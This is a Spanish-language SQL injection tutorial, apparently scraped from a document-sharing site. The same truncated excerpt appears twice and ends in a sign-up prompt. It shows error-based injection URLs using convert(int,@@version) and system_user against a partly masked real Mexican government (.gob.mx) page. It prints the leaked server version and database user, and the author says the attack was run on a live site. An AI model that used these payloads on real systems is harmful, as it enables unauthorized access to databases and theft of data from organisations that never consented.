SQL Injection en SQL Server y función convert()
Páginas: 3 (744 palabras)
Publicado: 2 de junio de 2014
25 Nov 2011
SQL Injection en SQL Server y función convert()
Este artículo esta escrito con fines didácticos y nunca para incitar o promover que el lector use esto
con fines delictivos. No me hagoresponsable por el uso que le das a esta información.
Anteriormente hemos tratado temas de SQL Injection, sin embargo siempre nos basamos en el
sistema de gestión de base de datos (SGBD) MySql asíque esta vez dedicaremos un espacio para
introducirnos en ataques a sistemas SQL SERVER.
Igual que en artículos anteriores veremos la forma de listar las tablas, campos y registros que
conformanla base de datos a atacar.
Las pruebas fueron realizadas sobre un sitio real, sin embargo omitiré el nombre y dirección solo
pondré impresiones de pantalla del resultado del ataque.
No veremosBLIND SQLI ya que nos basaremos en los errores devueltos por el servidor, para generar
estos errores inyectaremos la función convert() que sirve para hacer conversiones entre tipos de datos, por
tantopediremos que convierta un tipo de dato totalmente incompatible.
La primera prueba que nos servirá como testeo es pedir la versión de SQL con ayuda de @@version que
además será útil para saber lasintaxis que debemos usar.
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,@@version) -- h
Versión: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 200523:18:38 Copyright (c) 1988-2003
Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Al final incluimos el carácter comentario “--” para que omita el resto dela consulta.
Sacamos el usuario con el que la aplicación esta corriendo SQL Server
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,system_user) -- h
Usuario:portalconsultas
Sacamos los permisos del usuario con el que esta corriendo SQL Server.
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,(SELECT top
1 name FROM...
SQL Injection en SQL Server y función convert()
Este artículo esta escrito con fines didácticos y nunca para incitar o promover que el lector use esto
con fines delictivos. No me hagoresponsable por el uso que le das a esta información.
Anteriormente hemos tratado temas de SQL Injection, sin embargo siempre nos basamos en el
sistema de gestión de base de datos (SGBD) MySql asíque esta vez dedicaremos un espacio para
introducirnos en ataques a sistemas SQL SERVER.
Igual que en artículos anteriores veremos la forma de listar las tablas, campos y registros que
conformanla base de datos a atacar.
Las pruebas fueron realizadas sobre un sitio real, sin embargo omitiré el nombre y dirección solo
pondré impresiones de pantalla del resultado del ataque.
No veremosBLIND SQLI ya que nos basaremos en los errores devueltos por el servidor, para generar
estos errores inyectaremos la función convert() que sirve para hacer conversiones entre tipos de datos, por
tantopediremos que convierta un tipo de dato totalmente incompatible.
La primera prueba que nos servirá como testeo es pedir la versión de SQL con ayuda de @@version que
además será útil para saber lasintaxis que debemos usar.
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,@@version) -- h
Versión: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 200523:18:38 Copyright (c) 1988-2003
Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Al final incluimos el carácter comentario “--” para que omita el resto dela consulta.
Sacamos el usuario con el que la aplicación esta corriendo SQL Server
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,system_user) -- h
Usuario:portalconsultas
Sacamos los permisos del usuario con el que esta corriendo SQL Server.
http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,(SELECT top
1 name FROM...
Leer documento completo
Regístrate para leer el documento completo.